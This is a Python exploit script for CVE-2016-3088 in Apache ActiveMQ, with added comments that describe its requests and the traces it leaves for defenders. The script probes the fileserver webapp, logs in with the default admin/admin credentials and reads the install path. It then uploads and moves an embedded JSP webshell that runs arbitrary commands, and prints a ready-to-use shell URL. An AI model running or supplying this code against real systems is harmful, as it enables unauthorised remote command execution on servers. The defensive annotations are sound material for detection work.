##!/usr/bin/python3
# -*- coding:utf-8 -*-
# author(cn):大剑
# author(en):cl4ym0re
import argparse
import requests
import re
# ASCII-art banner printed once at startup by the __main__ block; purely cosmetic.
banner = """
___ __ ____ ___ _ __ _____ ___ ___ ___
/ __\/\ /\ /__\ |___ \ / _ \ / | / /_ |___ / / _ \ ( _ ) ( _ )
/ / \ \ / //_\ _____ __) || | | || || '_ \ _____ |_ \ | | | | / _ \ / _ \
/ /___ \ V ///__|_____|/ __/ | |_| || || (_) ||_____|___) || |_| || (_) || (_) |
\____/ \_/ \__/ |_____| \___/ |_| \___/ |____/ \___/ \___/ \___/
"""
def exploit(h):
    """Probe an ActiveMQ web console for CVE-2016-3088 and, on confirmation, stage a JSP file via the fileserver webapp.

    h: base URL of the broker's web console. The relative paths below are
       appended by plain string concatenation, so the value is expected to
       end with '/'; nothing here validates or normalises it.

    What a defender sees from this function, taken from the requests it makes:
      * an unauthenticated GET on /fileserver, then basic-auth GETs with the
        default 'admin'/'admin' pair on /api, /admin and
        /admin/test/systemProperties.jsp, then a PUT of noharm.txt to
        /fileserver and a MOVE of that file with a 'file://' Destination
        header; the PUT and MOVE carry a Googlebot User-Agent.
      * the chain stops at the first stage that fails, so disabling/removing
        the fileserver webapp or changing the default console credentials
        breaks it before any file is written.
    """
    host = h;  # NOTE(review): stray semicolon; no trailing-slash check, so the path joins below rely on the caller.
    header = {
        'Connection': 'close',
        'User-Agent': 'Googlebot/2.1 ( http://www.googlebot.com/bot.html)'
    }
    path = str(host + 'admin/test/systemProperties.jsp')
    file_server = str(host + 'fileserver')
    api = str(host + 'api')
    admin_ = str(host + 'admin')
    # Stage 1: unauthenticated GET on /fileserver. No timeout is set on any
    # request in this function, so an unresponsive host blocks indefinitely.
    req = requests.get(file_server, None)
    # Bitwise '|' on two bools: both operands are always evaluated (no
    # short-circuit), although the result is the same as 'or' here.
    if (bytes("disabled", 'UTF-8') not in req.content) | (bytes("file access.", 'UTF-8') in req.content):
        print("\n[+]fileserver Detected!\n")
        # Stage 2: default console credentials. Every later request reuses
        # this same hard-coded pair, so a changed password ends the chain here.
        req = requests.get(api, auth=('admin', 'admin'))
        if bytes('Directory: /api/', 'UTF-8') in req.content:
            print("[+]Weak password Detected!\n")
            req = requests.get(admin_, auth=('admin', 'admin'))
            html = str(req.content, 'UTF-8')
            # re.search returns None when no 5.x.y string appears in the
            # console page; .group() on None raises AttributeError.
            version = re.search('5\.\d+\.\d+', html).group()
            print('[+]ActiveMQ version:' + version + '\n')
            choice = input("[+]It seems like the host is vulnerable,upload webshell?[y/n]\n")
            if choice != "y":
                exit()  # builtins exit() (provided by the site module), not sys.exit.
            else:
                # Stage 3: read activemq.home from the systemProperties table
                # to learn where the webapps live on disk.
                req = requests.get(path, auth=('admin', 'admin'))
                if (bytes("activemq.home", 'UTF-8') in req.content):
                    content = str(req.content, 'UTF-8')
                    # Same None risk as the version regex above: a layout
                    # change in the table makes .group() raise.
                    tmp_path = re.search('(activemq\.home[</td>]+)([\r|\n|\s]+)([<td>]+)(.*)([</td>]+)', content).group()
                    ab_path = re.sub('activemq\.home|<td>|</td>|\r|\n|\s', '', tmp_path)
                    print("[+]absolute path obtained:" + ab_path + '\n')
                    #Here you can paste your own webshell↓
                    payload = r"""<% if("9527".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
                    # Stage 4: PUT to the fileserver upload directory. An HTTP
                    # PUT on /fileserver/* is the first write-side indicator a
                    # server access log shows for this chain.
                    tmp_shell_path = file_server + "/noharm.txt"
                    put = requests.put(tmp_shell_path, data=payload, headers=header)
                    if put.status_code == 204:  # 204 is treated as a successful upload.
                        print("[+]Upload txt file success,trying to go deeper......\n")
                        # Stage 5: MOVE with a 'file://' Destination pointing
                        # inside the api webapp. A MOVE method carrying a
                        # file:// Destination header is the strongest single
                        # indicator to alert on for this CVE.
                        evil_headers = {
                            'Destination': 'file://' + ab_path + '/webapps/api/evil.jsp',
                            'Connection': 'close',
                            'User-Agent': 'Googlebot/2.1 ( http://www.googlebot.com/bot.html)'
                        }
                        move = requests.request('MOVE', url=tmp_shell_path, headers=evil_headers)
                        if move.status_code == 204:
                            print("[*]Here is your shell,enjoy!:" + host + "api/evil.jsp?pwd=9527&i=whoami")
                            exit()
                        # A non-204 MOVE is silently ignored: the function
                        # returns with noharm.txt left in the fileserver directory.
                else:
                    print("[-]Cant figure out the absolute path!")
        else:
            print("[-]Host is NOT VULNERABLE!!")
    else:
        print('[-]CAN NOT access fileserver!!\n[-]Host is NOT VULNERABLE!!')
if __name__ == '__main__':
    # CLI entry point: a single optional -u/--url argument handed straight to
    # exploit(); the base URL is not validated despite the message below.
    print(banner)
    parser = argparse.ArgumentParser()
    parser.add_argument("-u","--url",help="http://www.target.com/",type=str)
    args = parser.parse_args()
    if args.url != None:  # NOTE(review): 'is not None' is the idiomatic None test.
        exploit(args.url)
    else:
        print("[-]No URL address was provided or the URL address is illegal")
        print("[?]usage: python CVE-2016-3088.py -u http://ip(domain):port/)")